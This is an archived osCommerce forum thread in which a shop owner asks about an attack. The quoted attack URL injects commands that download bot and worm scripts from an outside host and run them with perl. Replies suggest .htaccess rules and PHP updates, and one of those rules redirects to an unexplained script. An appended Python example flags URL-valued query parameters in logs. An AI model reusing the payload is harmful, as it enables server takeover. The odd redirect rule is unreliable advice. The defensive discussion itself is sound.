osCommerce

Hacking Attempt. Any need to worry?


assembler

Posted

I have been having some hacking attempts on my site. The script basically crawls my site and attempts to cause problems by running commands in the URL. The URL used looks like (I separated onto multiple lines):

?osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;
wget%20www.visualcoders.net/spybot.txt;
wget%20wwwwww.visualcoders.net/worm1.txt;
wget%20www.visualcoders.net/php.txt;
wget%20www.visualcoders.net/ownz.txt;
wget%20www.visualcoders.net/zone.txt;
perl%20spybot.txt;
perl%20worm1.txt;
perl%20ownz.txt;
perl%20php.txt

Posted

You can try adding this to your .htaccess:

RewriteCond %{QUERY_STRING} rush=([^&]+) [NC]
RewriteRule ^.*$ emailsforyou.php [L]

Posted

As long as your server version of PHP is secure (4.3.10 or 5+), and as long as you have no insecure old versions of various php scripts running you should be okay (e.g. phpBB, Invision Board, VBulletin, phpNuke, Post Nuke etc.)

Vger

  • 4 months later...
Posted

I'm using this (found on this board some time ago):

RewriteEngine On
RewriteCond %{QUERY_STRING} :/ [NC]
RewriteRule ^ - [F]

If ":/" is found in the query string it returns an access forbidden error message. There might be situations where you need to have ":/" in a query string of course. (I needed it once to install a script).

It really helped me out at the time, and I left it in place, just in case....
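
Added example, not part of the thread or of osCommerce: a Python script that lists which query parameters in an Apache access log carry a URL as their value, the pattern the `:/` rule above rejects, so that hits and legitimate exceptions can be reviewed before the rule starts returning 403s. The log lines, hosts, `install.php` and `return_url` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of an Apache common/combined log line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that begins with scheme:// (http://, ftp://, ...)
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)

# Constructed sample log lines (documentation addresses and .example hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2005:04:11:09 +0000] '
    '"GET /index.php?osCsid=http://files.example/spy.gif?&cmd=cd%20/tmp HTTP/1.0" 200 5120',
    '198.51.100.4 - - [12/Mar/2005:04:12:30 +0000] '
    '"GET /product_info.php?products_id=12&osCsid=3f9a1c HTTP/1.1" 200 8331',
    '198.51.100.9 - - [12/Mar/2005:04:13:02 +0000] '
    '"GET /install.php?return_url=http%3A%2F%2Fshop.example%2Fadmin HTTP/1.1" 200 412',
]

def url_valued_params(log_line):
    """Return [(name, value)] for query parameters whose value is a URL."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    query = urlsplit(m.group(1)).query
    # parse_qsl percent-decodes, so encoded forms (%3A%2F%2F) are seen as well.
    return [(name, value)
            for name, value in parse_qsl(query, keep_blank_values=True)
            if SCHEME_RE.match(value)]

def review(log_lines, expected_url_params=frozenset()):
    """Split hits into (suspicious, expected).

    expected_url_params: names of parameters that legitimately carry URLs
    on this site (hypothetical here), i.e. the exceptions the rule would break.
    """
    suspicious, expected = [], []
    for line in log_lines:
        for name, value in url_valued_params(line):
            bucket = expected if name in expected_url_params else suspicious
            bucket.append((name, value))
    return suspicious, expected

if __name__ == "__main__":
    suspicious, expected = review(SAMPLE_LOG, {"return_url"})
    for name, value in suspicious:
        print("suspicious:", name, "=", value)
    for name, value in expected:
        print("expected:  ", name, "=", value)
```
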

Archived

This topic is now archived and is closed to further replies.
